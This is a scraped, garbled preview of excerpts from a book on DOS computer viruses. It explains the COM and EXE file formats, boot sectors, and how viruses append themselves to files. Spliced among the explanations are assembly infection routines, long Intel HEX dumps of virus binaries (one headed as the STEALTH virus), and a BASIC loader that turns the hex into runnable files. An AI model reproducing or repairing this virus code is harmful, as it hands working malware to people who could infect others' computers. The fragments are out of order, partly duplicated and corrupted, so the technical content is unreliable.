The Little Black Book of Computer Viruses phần 2 pptx

... COM file. 26 The Little Black Book of Computer Viruses essors. In the CP/M world, 64 kilobytes was all the memory a computer had. The lowest 25 6 bytes of that memory was reservedfor the operating ... So the PSP (and whole COM file concept) became a part of DOS. The result is that a lot of the information stored in the PSP is of little Offset Size Description0 H 2 Int 20 H Instruction 2 2 Address ... CP/M waspopular in the late seventies and early eighties as an operatingsystem for microcomputers based on the 8080 and Z80 microproc- 22 The Little Black Book of Computer Viruses one could not...

... + [( 32* ROOT_ENTRIES) + SEC_SIZE - 1]/SEC_SIZEand the size of the file in sectors. The file size in bytes is stored at the offset 1CH from the start of the directory entry at 0000:0500H. The number ... just quit78 The Little Black Book of Computer Viruses system is kept in three files on disk. One is the familiar COM-MAND.COM and the other two are hidden files (hidden by setting the “hidden” ... have the same data, but that will differ from 1.2M drives and hard drives,etc. The standard data for the start of the boot sector is describedin Table 2. It consists of a total of 43 bytes of...

... sort? Per-haps they are the electronic analog of the simplest one-celled8 The Little Black Book of Computer Viruses The Little Black Book of Computer Viruses Volume One: The Basic TechnologyBy ... protected.4 The Little Black Book of Computer Viruses day to day computing. Many people think of viruses as sort of a black art. The purpose of this volume is to bring them out of the closet and ... has to put the program on11 The Little Black Book of Computer Viruses The Basics of the Computer VirusA plethora of negative magazine articles and books havecatalyzed a new kind of hypochondria...

... FoundYesNo34 The Little Black Book of Computer Viruses cx:dx is used as the offset from the end of the file. Since the firstthing the virus must do is place its code at the end of the COM fileit ... [HANDLE]44 The Little Black Book of Computer Viruses Now, with the main body of viral code appended to the end of the COM file under attack, the virus must do some clean-upwork. First, it must move the ... dx,OFFSET COMFILE;set offset of asciiz string mov cl,00000110B ;set hidden and system attributes 32 The Little Black Book of Computer Viruses Once the file is open, the virus may perform the...

... toFIND_FILEFINDBRFINDEXEFILE_OKFIRSTDIRNEXTDIRSUBDIR1(CURRENT)SUBDIR2SD11 SD 12 SD21SD111 SD1 12 SD 121 SD211SD11 12 SD1113 SD2111 SD21 12 ROOT DIRFigure 12: Logic of the file search routines. 62 The Little Black Book of Computer Viruses header has two parts to it, ... value in the code segment60 The Little Black Book of Computer Viruses Offset Size Name Description 12H (Cont) properly. The INTRUDER virus will not alter the checksum. 14H 2 Initial ip The initial ... risk! It’s not like any other computer program you’ve ever run! 52 The Little Black Book of Computer Viruses infecting every EXE file on the system. To do that we make use of the typical PC user’s...

... DOS 92 The Little Black Book of Computer Viruses VIRUS_START: call GET_START ;get start address;This is a trick to determine the location of the start of the program. We put ;the address of GET_START ... point of view) if it infects the diskette even when the diskis full, and it will have to overwrite a file to infect the disk84 The Little Black Book of Computer Viruses first 30 bytes of code ... routine moves the virus (this program) to the end of the COM file;Basically, it just copies everything here to there, and then goes and;adjusts the 5 bytes at the start of the program and the five...

... drives):10015000000000000000000000000000000000009F:10016000000000000000000000000000000000008F:10017000000000000000000000000000000000007F:10018000000000000000000000000000000000006F:10019000000000000000000000000000000000005F:1001A000000000000000000000000000000000004F:1001B000000000000000000000000000000000003F:1001C000000000000000000000000000000000002F:1001D000000000000000000000000000000000001F:1001E000000000000000000000000000000000000F:1001F00000000000000000000000000000000000FF:10 020 000494E54 525 54445 522 E455845008CC88E8F:10 021 000D8BA0000B441CD21B44CB000CD210000CB:10 022 00000000000000000000000000000000000CE:10 023 00000000000000000000000000000000000BE:10 024 00000000000000000000000000000000000AE:10 025 000000000000000000000000000000000009E:10 026 000000000000000000000000000000000008E:10 027 000000000000000000000000000000000007E:10 028 000000000000000000000000000000000006E:10 029 000000000000000000000000000000000005E:1002A000000000000000000000000000000000004E:1002B000000000000000000000000000000000003E:1002C000000000000000000000000000000000002E:1002D000000000000000000000000000000000001E:1002E000000000000000000000000000000000000E:1002F00000000000000000000000000000000000FE:1003000000000000000000000000000000000000ED:1003100000000000000000000000000000000000DD:100 320 00AAC800000000000000000000000000005B:1003300000000000000000000000000000000000BD:1003400000000000000000000000000000000000AD:10035000000000000000000000000000000000009D:10036000000000000000000000000000000000008D:10037000000000000000000000000000000000007D:10038000000000000000000000000000000000006D:10039000000000000000000000000000000000005D:1003A000000000000000000000000000000000004D:1003B000000000000000000000000000000000003D:1003C0000000005C2A2E455845005C2A2E2A0000B9:1003D000000000000000000000000000000000001D:1003E000000000000000000000000000000000000D:1003F00000000000000000000000000000000000FD:1004000000000000000000000000000000000000EC:1004100000000000000000000000000000000000DC:100 420 00000000000000000000000001508CC88E99:10043000D88CC0A30400E867037518E86B03E86E66:1004400003E 826 007509E89103E8E401E8CE03E833:10045000760358BB 020 0FA8ED3BC00018E0604005E:100460008E1E0400FBEA0D000000B05CA2AF00BECF:10047000B00032D2B447CD21803EB00000750532C5:10048000C0A2AF00B002A2FD00E81000740D32C09F103 The Little Black Book of Computer Viruses ;**************************************************************************;SETSR ... 108:1007D000D8B41ACD218CC88ED8C3B443B000BAAFF8:1007E00000CD21880E0001B443B001BAAF00B100C2:1007F000CD21BAAF00B002B43DCD21A3FE00B45765:1008000032C08B1EFE00CD21890E01018916030 125 :10081000A 122 00A30701A 120 00A30501C38B160399:100 820 00018B0E0101B457B0018B1EFE00CD21B 427 :100830003E8B1EFE00CD218A0E000132EDB443B086:0708400001BAAF00CD21C396:00000001FF The assembly ... enlarging it.109 The Little Black Book of Computer Viruses :10049000A2AF00FEC0A2FD00E80100C3E851007356:1004A0004C803EFD0000743FFE0EFD00BFAF00BE5D:1004B000AA00E8BB004757E876007 523 5F32C0AA60:1004C000BFAF00BB4F00A0FD00B22BF6E203D88BFC:1004D000F3E89C0057E8C4FF7412E8760074DDFE70:1004E00006FD005F32C0AAB0010AC0C35F32C0C3BC:1004F000BA0600B41ACD21BFAF00BEA300E8700059:1005000057BAAF00B93F00B44ECD210AC075195F8C:1005100047AABFAF00BE2400E855004F57E863006C:100 520 00730CB44FCD21EBE35FC60500F9C35FC385:10053000E8310052B41ACD21BAAF00B91000B44E60:10054000CD215B0AC0751CF64715107406807F1E0E:100550002E750EE80E0052B41ACD21B44FCD21EB0A:10056000E132C0C3BA3100B02BF 626 FD0003D0C380:1005700 026 8A05470AC075F84F57FCACAA0AC07511:10058000F95FC3E 823 00 720 DE80B00 720 8E833003E:10059000 720 3E84500C3B04DB45A3B0687007402AD:1005A000F9C333C02B06A100C3BAAF00B8 023 DCDDA:1005B00 021 720 FA3FE008BD8B91C00BA8700B43F8C:1005C000CD21C3A18F0003C003C02B068D0003C043:1005D00003C02B069F003D0800C3A19D0003068FAA:1005E00000BA1000F7E28BCA8BD08B1EFE00B80059:1005F00042CD21B43F8B1EFE00BA0901B9 020 0CDE5:1006000 021 720 BA109013B060000F87501F9C3A096:10061000050 124 0F7419B910002AC8BA2705010E64:100 620 00050183160701008B1EFE00B440CD21C3D7:100630008B0E07018B1605018B1EFE00B80042CD04:1006400 021 E8CBFFB 927 0533D28B1EFE00B440CD85:1006500 021 8B1605018B0E0701BB33014303D3BB6E:10066000000013CB8B1EFE00B80042CD21BA9500CE:100670008B1EFE00B9 020 0B440CD218B1605018B04:100680000E0701BB39014303D3BB000013CB8B1E04:10069000FE00B80042CD21BA97008B1EFE00B902C1:1006A00000B440CD218B1605018B0E0701BB45011F:1006B00083C30103D3BB000013CB8B1EFE00B80 025 :1006C00042CD21BA9B008B1EFE00B90400B440CD80:1006D00 021 33C933D28B1EFE00B80042CD21A105C3:1006E00001B104D3E88B1E070180E30FB104D2E30C:1006F00002E32B068F00A39D00BB270583C310B 127 :1007000004D3EB03C3A39500B80C01A39B00B8006E:1007100001A397008B160701A10501BB270503C3A1:100 720 0033DB13D30500 021 3D350B109D3E8B1076B:10073000D3E203C2A38B005 825 FF01A38900B802AE:100740000001068D00B91C00BA87008B1EFE00B4A4:1007500040CD21A18D004848BB0400F7E303069F6C:1007600000BB000013D38BCA8BD08B1EFE00B800D9:1007700042CD21A19D00BB330143891E8700A3897F:1007800000A19D00BB450183C303891E8B00A38D7F:1007900000B90800BA87008B1EFE00B440CD21C30B:1007A00032E4C3CD1A80E200C3B090A2 820 4C3B485:1007B0002FCD21891E 020 08CC0A304008CC88EC0DE:1007C000BA0600B41ACD21C38B16 020 0A104008E14Appendix...

... Viruses :106F8000BB357A8A073C807502B004B303F6E3058B:106F900041718BD88A2F8A77018A4F 028 A56068BD5:106FA0005E0A8B46 028 EC0B801 029 CFF1E00708AEA:106FB000460C3C01746C5D071F5A595B5881C30035:106FC000 025 0FEC8FEC180FA8075345351 525 657A4:106FD0001E55061FC607008BF38BFB47B400BB00 92 :106FE00002F7E38BC849F3A4F89C588946145D1F47:106FF0005F5E5A595B58B400FEC981EB0002CF9C1A:107000002EFF1E007050558BEC9C5889460A 720 C5E:1070100081EB0002FEC95D5858B400CF5D5883C4AF:107 020 0002CF8B46 125 09DF89C588946 125 D071F6F:107030005A595B58B400CF5D071F5A595B58E9CEC7:10704000FE2701094F010F4F01094F01 120 00007F0:10705000505351 521 E06558BEC0E1F0E078AC2E884:107060002D047308E 828 047303E9CB00E84E047488:1070700003E9C300BB357A8A073C807502B004B3CC:1070800003F6E30541718BD88A2F8A77018A4F 027 4:107090008A56068B5E0A8B46 028 EC0B801039CFF9F:1070A0001E0070FB8A560680FA807533C606357C 52 :1070B000805657BFBE7D8B760A81C6BE7D81EE00AD:1070C0007C061F0E07B91400F3A50E1FB80103BB01:1070D000007CB90100BA80009CFF1E00705F5E8AD0:1070E000460C3C01743C8A560680FA8074345D0775:1070F0001F5A595B5881C300 025 0FEC8FEC19C2E26:10710000FF1E0070FB50558BEC9C5889460A 720 C90:1071100081EB0002FEC95D5858B400CF5D5883C4AE:107 120 0002CF8B46 125 09DF89C588946 125 D071F6E:107130005A595B58B400CF5D071F5A595B58E9CEC6:10714000FDE855007537505351 525 6571E558BEC7C:1071500 026 C60700061F8BF38BFB47B400BB00 025 B:10716000F7E38BC849F3A48B4614509DF89C5889CB:1071700046145D1F5F5E5A595B58B400CFE98FFD1E:10718000E8160075F855508BEC8B4608509DF99C1D:107190005889460858B4045DCF505351 521 E060E0C:1071A0001F0E078AC2E8E7 027 30432C0EB03E80C43:1071B00003071F5A595B58C39C5657505351 521 ED0:1071C000060E070E1FFBBB137A8B1F8AC281FBD0F2:1071D000 027 505E82B00EB1F81FB60097505E8A12E:1071E00000EB1481FBA0057505E 820 01EB0981FB8C:1071F000400B7503E89101071F5A595B585F5E9D6C:10 720 000C38AD0B90300B600E810 028 BD8 727 2BFEF:10 721 000117A8B0 525 F0FF0B45 020 B450475 628 B37:10 722 000050D70FFABB8F77FABB8FF00AB8BC3B9F0:10 723 00003008AD3B600E8F001 724 68AD0B905008F:10 724 000B600E8E40172F4E845 027 2358AD0B6016E:10 725 000B90 927 E8D301 722 950BF037CBE037AB96C:10 726 0001900F3A5C606357C0058E839 027 212BB36:10 727 00000708AD0B601B90 427 B805039CFF1E0030:10 728 00070C38AD0B90800B600E88F018BD8 727 B 32 :10 729 000BFDD7B8B050B45 020 B45040B45060B45FB:1072A000087568B8F77FABB8FFF7ABB87FFFABB82E:1072B000F77FABB8FF00AB8BC3B908008AD3B60 029 :1072C000E86601 724 68AD0B90F00B600E85A01 722 A:1072D000F4E8BB01 723 58AD0B601B90F4FE8490115131 The Little Black Book of Computer Viruses Appendix E: The STEALTH VirusWARNING: The STEALTH ... Viruses :106F8000BB357A8A073C807502B004B303F6E3058B:106F900041718BD88A2F8A77018A4F 028 A56068BD5:106FA0005E0A8B46 028 EC0B801 029 CFF1E00708AEA:106FB000460C3C01746C5D071F5A595B5881C30035:106FC000 025 0FEC8FEC180FA8075345351 525 657A4:106FD0001E55061FC607008BF38BFB47B400BB00 92 :106FE00002F7E38BC849F3A4F89C588946145D1F47:106FF0005F5E5A595B58B400FEC981EB0002CF9C1A:107000002EFF1E007050558BEC9C5889460A 720 C5E:1070100081EB0002FEC95D5858B400CF5D5883C4AF:107 020 0002CF8B46 125 09DF89C588946 125 D071F6F:107030005A595B58B400CF5D071F5A595B58E9CEC7:10704000FE2701094F010F4F01094F01 120 00007F0:10705000505351 521 E06558BEC0E1F0E078AC2E884:107060002D047308E 828 047303E9CB00E84E047488:1070700003E9C300BB357A8A073C807502B004B3CC:1070800003F6E30541718BD88A2F8A77018A4F 027 4:107090008A56068B5E0A8B46 028 EC0B801039CFF9F:1070A0001E0070FB8A560680FA807533C606357C 52 :1070B000805657BFBE7D8B760A81C6BE7D81EE00AD:1070C0007C061F0E07B91400F3A50E1FB80103BB01:1070D000007CB90100BA80009CFF1E00705F5E8AD0:1070E000460C3C01743C8A560680FA8074345D0775:1070F0001F5A595B5881C300 025 0FEC8FEC19C2E26:10710000FF1E0070FB50558BEC9C5889460A 720 C90:1071100081EB0002FEC95D5858B400CF5D5883C4AE:107 120 0002CF8B46 125 09DF89C588946 125 D071F6E:107130005A595B58B400CF5D071F5A595B58E9CEC6:10714000FDE855007537505351 525 6571E558BEC7C:1071500 026 C60700061F8BF38BFB47B400BB00 025 B:10716000F7E38BC849F3A48B4614509DF89C5889CB:1071700046145D1F5F5E5A595B58B400CFE98FFD1E:10718000E8160075F855508BEC8B4608509DF99C1D:107190005889460858B4045DCF505351 521 E060E0C:1071A0001F0E078AC2E8E7 027 30432C0EB03E80C43:1071B00003071F5A595B58C39C5657505351 521 ED0:1071C000060E070E1FFBBB137A8B1F8AC281FBD0F2:1071D000 027 505E82B00EB1F81FB60097505E8A12E:1071E00000EB1481FBA0057505E 820 01EB0981FB8C:1071F000400B7503E89101071F5A595B585F5E9D6C:10 720 000C38AD0B90300B600E810 028 BD8 727 2BFEF:10 721 000117A8B0 525 F0FF0B45 020 B450475 628 B37:10 722 000050D70FFABB8F77FABB8FF00AB8BC3B9F0:10 723 00003008AD3B600E8F001 724 68AD0B905008F:10 724 000B600E8E40172F4E845 027 2358AD0B6016E:10 725 000B90 927 E8D301 722 950BF037CBE037AB96C:10 726 0001900F3A5C606357C0058E839 027 212BB36:10 727 00000708AD0B601B90 427 B805039CFF1E0030:10 728 00070C38AD0B90800B600E88F018BD8 727 B 32 :10 729 000BFDD7B8B050B45 020 B45040B45060B45FB:1072A000087568B8F77FABB8FFF7ABB87FFFABB82E:1072B000F77FABB8FF00AB8BC3B908008AD3B60 029 :1072C000E86601 724 68AD0B90F00B600E85A01 722 A:1072D000F4E8BB01 723 58AD0B601B90F4FE8490115131 ... YOUR OWN RISK!! 129 The Little Black Book of Computer Viruses :1001500016FD7D5BB870005033C050CB33D2F736FC:10016000187CFEC28AEA33D2F7361A7C881 629 7CBC:100170008BD0C3B402B106D2E60AF58BCA86E98AEF:1001800016FD7D8A3 629 7CCD1372FEC3BE1E7CBF50:100190001E05B9DF01F3A4BE007CBF0005B90B004A:1001A000F3A4C3BEC87DB40EAC0AC07404CD10EB7A:1001B000F5C349 424 D 424 94F2 020 434F4D494F20FE:1001C00 020 2 020 2 020 5359534B696C 726 F7 920 777F:1001D000617 320 6865 726 521 0D0A0A000000000045:1001E000000000000000000000000000000000000F:1001F000000000000000000000000000000055AA00:00000001FFTo...

... #1180 CLOSE #2 190 END 20 0 REM THIS SUBROUTINE DECOMPOSES ONE LINE OF THE HEX FILE 21 0 H$=LEFT$(S$,3) 22 0 H$=RIGHT$(H$ ,2) 23 0 GOSUB 540 24 0 COUNT%=X% 25 0 CSUM%=COUNT% 26 0 H$=LEFT$(S$,7) 27 0 H$=RIGHT$(H$,4) 28 0 ... H$=LEFT$(S$,9 +2* J%)360 H$=RIGHT$(H$ ,2) 370 GOSUB 500380 CSUM%=CSUM%+X%390 LSET O$=C$400 PUT #2, ADDR%+J%410 NEXT J%153 The Little Black Book of Computer Viruses 420 H$=LEFT$(S$,11 +2* COUNT%)430 ... asSTEALTH.COM. The program disk has PUT programs for otherformats, or you can modify PUT_360 to do it.151 The Little Black Book of Computer Viruses Appendix F: The HEX File Loader The following...

... 1 62 The Little Black Book of Computer Viruses Computer Viruses, Artificial Lifeand EvolutionBy Mark A. Ludwig, 373 Pages, 1993, $26 .95ISBN 0- 929 408-07-1Step into the 21 st century where the ... integer. The methods of moving the pointer are as follows: al=0 moves the pointer relative to the beginning of the file, al=1 moves the pointer relative to the currentlocation, al =2 moves the pointer ... continue the search from. The data in the DTA is formatted as follows:Byte Size Description 0 21 Reserved for DOS Find Next 21 1 Attribute of file found 22 2 Time on file found 24 2 Date on...